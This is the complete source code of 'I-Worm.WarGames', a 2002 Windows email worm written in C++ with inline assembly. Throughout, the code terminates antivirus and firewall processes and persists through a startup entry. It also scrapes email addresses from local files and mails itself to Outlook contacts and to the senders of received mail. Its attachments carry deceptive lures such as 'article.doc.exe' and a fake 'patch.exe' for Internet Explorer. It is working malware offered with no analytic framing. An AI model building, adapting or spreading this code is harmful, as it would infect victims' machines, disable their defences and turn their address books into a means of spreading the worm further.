I-Worm.WarGames - Source Code

1. /*
2. Name : I-Worm.WarGames
3. Author : PetiK
4. Date : February 12th 2002 - February 22th 2002
5. Language : C++/Win32asm
6. */
7.  
8. #include <stdio.h>
9. #include <windows.h>
10. #include <mapi.h>
11. #include <tlhelp32.h>
12. #pragma argused
13. #pragma inline
14.  
15. char    filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
16. int num,counter=0;
17. char    *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
18.          "n","o","p","q","r","s","t","u","v","w","x","y","z"};
19. char    dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
20. LPSTR   SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
21. BYTE    desktop[50],favoris[50],personal[50],cache[50],page[150];
22. DWORD   sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
23.     sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
24. DWORD   type=REG_SZ;
25. FILE    *vbsworm,*winstart;
26. HANDLE  lSnapshot,myproc;
27. BOOL    rProcessFound;
28.  
29. LHANDLE session;
30. MapiMessage mess;
31. MapiMessage *mes;
32. MapiRecipDesc from;
33. char messId[512],mname[50],maddr[30];
34. HINSTANCE hMAPI;
35.  
36. WIN32_FIND_DATA     ffile;
37. PROCESSENTRY32      uProcess;
38. HKEY            hReg;
39. SYSTEMTIME      wartime;
40.  
41. void StopAV(char *);
42. void FindFile(char *,char *);
43. void GetMail(char *,char *);
44. void sendmail(char *);
45.  
46. ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
47. ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
48. ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
49. ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
50. ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
51. ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
52.  
53. int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
54. {
55. // Kill Some AntiVirus
56. StopAV("AVP32.EXE");        // AVP
57. StopAV("AVPCC.EXE");        // AVP
58. StopAV("AVPM.EXE");     // AVP
59. StopAV("WFINDV32.EXE");     // Dr. Solomon
60. StopAV("F-AGNT95.EXE");     // F-Secure
61. StopAV("NAVAPW32.EXE");     // Norton Antivirus
62. StopAV("NAVW32.EXE");       // Norton Antivirus
63. StopAV("NMAIN.EXE");        // Norton Antivirus
64. StopAV("PAVSCHED.EXE");     // Panda AntiVirus
65. StopAV("ZONEALARM.EXE");    // ZoneAlarm
66.  
67. // Kill Some Worm
68. StopAV("KERN32.EXE");       // I-Worm.Badtrans
69. StopAV("SETUP.EXE");        // I-Worm.Cholera
70. StopAV("RUNDLLW32.EXE");    // I-Worm.Gift
71. StopAV("GONER.SCR");        // I-Worm.Goner
72. StopAV("LOAD.EXE");     // I-Worm.Nimda
73. StopAV("INETD.EXE");        // I-Worm.Plage - BadTrans
74. StopAV("FILES32.VXD");      // I-Worm.PrettyPark
75. StopAV("SCAM32.EXE");       // I-Worm.Sircam
76. StopAV("GDI32.EXE");        // I-Worm.Sonic
77. StopAV("_SETUP.EXE");       // I-Worm.ZippedFiles
78. StopAV("EXPLORE.EXE");      // I-Worm.ZippedFiles
79. StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles
80.  
81. GetModuleFileName(hInst,filename,100);
82. GetSystemDirectory((char *)sysdir,100);
83. SetCurrentDirectory(sysdir);
84. CopyFile(filename,"article.doc.exe",TRUE);
85. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
86. RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
87. RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
88. RegCloseKey(hReg);
89.  
90. randomize();
91. num=rand() % 10;
92. randname:
93. strcat(copyr,alph[GetTickCount()%25]);
94. if(++counter==num) {
95.     strcat(copyr,".exe");
96.     MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
97.     CopyFile(filename,copyr,FALSE);
98.     WriteProfileString("WINDOWS","RUN",copyr);
99.     WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
100.     goto endrandname;
101.     }
102. Sleep(GetTickCount()%100);
103. goto randname;
104. endrandname:
105.  
106. hMAPI=LoadLibrary("MAPI32.DLL");
107. (FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
108. RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
109. RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
110. RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
111. RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
112. RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
113. RegCloseKey(hReg);
114. GetWindowsDirectory((char *)winhtm,100);
115.  
116. _asm
117. {
118. call    @wininet
119. db  "WININET.DLL",0
120. @wininet:
121. call    LoadLibrary
122. test    eax,eax
123. jz  end_asm
124. mov ebp,eax
125. call    @inetconnect
126. db  "InternetGetConnectedState",0
127. @inetconnect:
128. push    ebp
129. call    GetProcAddress
130. test    eax,eax
131. jz  end_wininet
132. mov edi,eax
133. verf:
134. push    0
135. push    Tmp
136. call    edi
137. dec eax
138. jnz verf
139.  
140. end_wininet:
141. push    ebp
142. call    FreeLibrary
143. end_asm:
144. jmp end_all_asm
145.  
146. Tmp dd 0
147.  
148. end_all_asm:
149. }
150.  
151. FindFile(desktop,"*.htm");
152. FindFile(desktop,"*.doc");
153. FindFile(favoris,"*.ht*");
154. FindFile(personal,"*.ht*");
155. FindFile(personal,"*.doc");
156. FindFile(personal,"*.xls");
157. FindFile(personal,"*.asp");
158. FindFile(cache,".ht*");
159. FindFile(cache,".php");
160. FindFile(cache,".asp");
161. FindFile(winhtm,".ht*");
162. FindFile(winhtm,".doc");
163.  
164.  
165. vbsworm=fopen("wargames.vbs","w");
166. fprintf(vbsworm,"On Error Resume Next\n");
167. fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
168. fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
169. fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
170. fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
171. fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
172. fprintf(vbsworm,"For Each C In MA.AddressLists\n");
173. fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
174. fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
175. fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
176. fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
177. fprintf(vbsworm,"EM.To=AD.Address\n");
178. fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
179. fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
180. fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
181. fprintf(vbsworm,"EM.Body=body\n");
182. fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
183. fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
184. fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
185. fprintf(vbsworm,"EM.Send\n");
186. fprintf(vbsworm,"End If\n");
187. fprintf(vbsworm,"Next\n");
188. fprintf(vbsworm,"End If\n");
189. fprintf(vbsworm,"Next\n");
190. fclose(vbsworm);
191. ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
192. Sleep(5000);
193. DeleteFile("wargames.vbs");
194.  
195. (FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
196. (FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
197. (FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
198. (FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
199. (FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
200. mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
201. if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
202.   do {
203.      if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
204.     strcpy(mname,mes->lpOriginator->lpszName);
205.     strcpy(maddr,mes->lpOriginator->lpszAddress);
206.     mes->ulReserved=0;
207.     mes->lpszSubject="Re: Fw:";
208.     mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
209.                 "I send you a nice program. Look at this.\n\n"
210.                 "   See you soon.";
211.     mes->lpszMessageType=NULL;
212.     mes->lpszDateReceived=NULL;
213.     mes->lpszConversationID=NULL;
214.     mes->flFlags=MAPI_SENT;
215.     mes->lpOriginator->ulReserved=0;
216.     mes->lpOriginator->ulRecipClass=MAPI_ORIG;
217.     mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
218.     mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
219.     mes->nRecipCount=1;
220.     mes->lpRecips->ulReserved=0;
221.     mes->lpRecips->ulRecipClass=MAPI_TO;
222.     mes->lpRecips->lpszName=mname;
223.     mes->lpRecips->lpszAddress=maddr;
224.     mes->nFileCount=1;
225.     mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
226.     memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
227.     mes->lpFiles->ulReserved=0;
228.     mes->lpFiles->flFlags=NULL;
229.     mes->lpFiles->nPosition=-1;
230.     mes->lpFiles->lpszPathName=filename;
231.     mes->lpFiles->lpszFileName="funny.exe";
232.     mes->lpFiles->lpFileType=NULL;
233.     mSendMail(session, NULL, mes, NULL, NULL);
234.     }
235.   }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
236. free(mes->lpFiles);
237. mFreeBuffer(mes);
238. mLogoff(session,0,0,0);
239. FreeLibrary(hMAPI);
240. }
241.  
242.  
243. }
244.  
245. void FindFile(char *folder, char *ext)
246. {
247. register bool abc=TRUE;
248. register HANDLE hFile;
249. char mail[128];
250. SetCurrentDirectory(folder);
251. hFile=FindFirstFile(ext,&ffile);
252. if(hFile!=INVALID_HANDLE_VALUE) {
253.     while(abc) {
254.     SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
255.     GetMail(ffile.cFileName,mail);
256.     if(strlen(mail)>0) {
257.     sendmail(mail);
258.     }
259.     abc=FindNextFile(hFile,&ffile);
260.     }
261. }
262.  
263. }
264.  
265. void GetMail(char *namefile, char *mail)
266. {
267. HANDLE  hf,hf2;
268. char    *mapped;
269. DWORD   size,i,k;
270. BOOL    test=FALSE,valid=FALSE;
271. mail[0]=0;
272.  
273. hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
274. if(hf==INVALID_HANDLE_VALUE)
275.     return;
276. size=GetFileSize(hf,NULL);
277. if(!size)
278.     return;
279. if(size<8)
280.     return;
281. size-=100;
282.  
283. hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
284. if(!hf2) {
285.     CloseHandle(hf);
286.     return;
287.     }
288.  
289. mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
290. if(!mapped) {
291.     CloseHandle(hf2);
292.     CloseHandle(hf);
293.     return;
294.     }
295.  
296. i=0;
297. while(i<size && !test) {
298. if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
299.     test=TRUE;
300.     i+=strlen("mailto:");
301.     k=0;
302.     while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
303.         if(mapped[i]!=' ') {
304.             mail[k]=mapped[i];
305.             k++;
306.             if(mapped[i]=='@')
307.                 valid=TRUE;
308.         }
309.         i++;
310.     }
311.     mail[k]=0;
312.     } else
313.     i++;
314. }
315.  
316. if(!valid)
317.     mail[0]=0;
318. UnmapViewOfFile(mapped);
319. CloseHandle(hf2);
320. CloseHandle(hf);
321. return;
322. }
323.  
324. void sendmail(char *tos)
325. {
326. memset(&mess,0,sizeof(MapiMessage));
327. memset(&from,0,sizeof(MapiRecipDesc));
328. wsprintf(subj,"Mail to %s.",tos);
329.  
330. from.lpszName=NULL;
331. from.ulRecipClass=MAPI_ORIG;
332. mess.lpszSubject=subj;
333. mess.lpszNoteText="I send you this patch.\n"
334.         "It corrects a bug into Internet Explorer and Outlook.\n\n"
335.         "   Have a nice day. Best Regards.";
336.  
337. mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
338.     if(!mess.lpRecips)
339.     return;
340. memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
341. mess.lpRecips->lpszName=tos;
342. mess.lpRecips->lpszAddress=tos;
343. mess.lpRecips->ulRecipClass=MAPI_TO;
344. mess.nRecipCount=1;
345.  
346. mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
347.     if(!mess.lpFiles)
348.     return;
349. memset(mess.lpFiles,0,sizeof(MapiFileDesc));
350. mess.lpFiles->lpszPathName=filename;
351. mess.lpFiles->lpszFileName="patch.exe";
352. mess.nFileCount=1;
353.  
354. mess.lpOriginator=&from;
355.  
356. mSendMail(0,0,&mess,0,0);
357.  
358. free(mess.lpRecips);
359. free(mess.lpFiles);
360. }
361.  
362. void StopAV(char *antivirus)
363. {
364. register BOOL term;
365. lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
366. uProcess.dwSize=sizeof(uProcess);
367. rProcessFound=Process32First(lSnapshot,&uProcess);
368. while(rProcessFound) {
369.     if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
370.         myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
371.         if(myproc!=NULL) {
372.             term=TerminateProcess(myproc,0);
373.         }
374.         CloseHandle(myproc);
375.     }
376.     rProcessFound=Process32Next(lSnapshot,&uProcess);
377. }
378. CloseHandle(lSnapshot);
379. }